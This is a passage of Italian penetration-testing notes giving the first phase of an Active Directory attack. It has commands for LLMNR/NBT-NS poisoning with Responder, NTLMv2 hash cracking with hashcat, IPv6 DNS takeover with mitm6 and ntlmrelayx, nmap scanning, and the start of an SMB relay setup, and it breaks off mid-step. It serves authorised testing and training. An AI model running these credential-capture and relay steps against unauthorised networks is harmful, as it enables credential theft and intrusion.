Indice dei contenuti


FASE 1 - RECONNAISSANCE / ENUMERATION

Primi step + Enumeration + Inicial Access

  1. Eseguo Responder: “ascolto” del traffico e intercettazione di hash NTLMv2
sudo responder -I <INTERFACE> -dwv

Se intercetto un hash: cracking con hashcat

hashcat -m 5600 <hashes.txt> <WORDLIST.txt>
  1. Medesimo scopo: attacco mitm6 (per massimo 10-15 minuti), eseguendo in due schede diverse
impacket-ntlmrelayx -6 -t ldaps://<IP> -wh fakewpad.<DOMAIN.local> -l <NOME_CARTELLA>

e

sudo mitm6 -d <DOMAIN.local>
  1. Scansione con nmap per identificare dominio, porte, servizi ed eventuali vulnerabilità
nmap -T4 -p- -sC -sV -Pn <IP>
  1. Se dalla scansione emerge la vulnerabilità di smb “signed required but not enabled", possiamo effettuare un smb relay attack. Mettiamo in off le voci smb e http in /etc/responder/Responder.conf, creiamo un file TARGETS.txt con gli indirizzi IP delle macchine vulnerabili e poi eseguiamo in due schede diverse: